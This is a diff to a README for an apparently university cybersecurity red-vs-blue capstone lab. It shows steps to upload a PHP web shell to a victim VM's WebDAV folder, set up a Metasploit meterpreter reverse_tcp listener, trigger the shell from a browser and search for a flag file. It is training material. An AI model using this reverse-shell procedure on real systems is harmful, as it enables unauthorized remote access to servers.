Jay-Idrees/UPenn-CyberSecurity-Red-vs-Blue-Team-Metasploit-Kibana-Capstone/README.md

 - Once shell.php is generated then you can copy it into `dav://192.168.1.105/webdav/` from the browser - this can be done from Kali Linux.
 In other words you will be

-- Now in Kali Linux run **Metasploit** and run the following commands to prepare for listening and retrograde connection of the  Capstone VM(victim) with Kali Linux
+- Now in Kali Linux run **Metasploit** and run the following commands to prepare for listening and retrograde connection of the  Capstone VM(victim) with Kali Linux.
+Run the following commands:

+- `msfconsole`
+- `set payload php/meterpreter/reverse_tcp`
+- `set lhost 192.168.1.90`
+- `set lport 666`
+- `run`

-- Run the malacious shell script on the Victim (Capstone) VM, you can actally run this from Kali linux by typing ` 192.168.1.105/webdav/shell.php` into the browser
+- Run the malacious shell script on the Victim (Capstone) VM, you can actally run this from Kali linux by typing ` 192.168.1.105/webdav/shell.php` into the browser - this will run the script on the Capstone server

-- Set the Lhost etc on metasploit.
-Once the script is run, the shell will switch to meterpreter
+- This will open up a meterpreter shell

 - Find the flag with meterpreter

+- `find / -name flag.txt 2>/dev/null`